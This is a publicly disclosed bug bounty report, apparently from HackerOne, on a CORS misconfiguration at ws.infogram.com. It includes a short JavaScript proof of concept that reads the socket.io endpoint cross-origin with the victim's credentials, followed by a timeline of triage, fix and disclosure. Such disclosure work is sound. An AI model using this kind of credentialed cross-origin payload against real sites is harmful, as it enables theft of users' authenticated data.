CORS on (ws.infogram.com)
State Resolved (Closed)
Disclosed publicly 2018-10-08T08:20:46.193Z
Reported To
Weakness Improper Access Control - Generic
Bounty
Collapse


Timeline
submitted a report to Infogram .
2018-06-28T16:31:36.887Z

Hey Team i don't know if it's valid or not i just want to let you know about this thanks.

Exploit

<html>
<script>
var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://ws.infogram.com/socket.io/?EIO=3&transport=polling&t=MH7BU79',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
</script>
</html>

Impact

As with superpowers, it’s all about knowing how to use it. Therefore, CORS is not necessarily a bad thing. We’ve seen in many cases that CORS has legitimate use, and this is why it was invented and made a web standard in the first place. However, you need to be aware of the CORS configuration you set up in your server and the side effects this has on security.

Regards,
Frans

kaspars Activities::BugTriaged
2018-06-29T07:19:00.268Z


kaspars Activities::BugResolved
2018-07-11T10:36:02.853Z
Thanks, it should be fixed now. Best regards, Kaspars


boxpy Activities::Comment
2018-07-16T11:33:19.967Z
Can we disclose this?


boxpy Activities::AgreedOnGoingPublic
2018-09-20T20:56:23.505Z


kaspars Activities::AgreedOnGoingPublic
2018-10-08T08:20:46.148Z


kaspars Activities::ReportBecamePublic
2018-10-08T08:20:46.212Z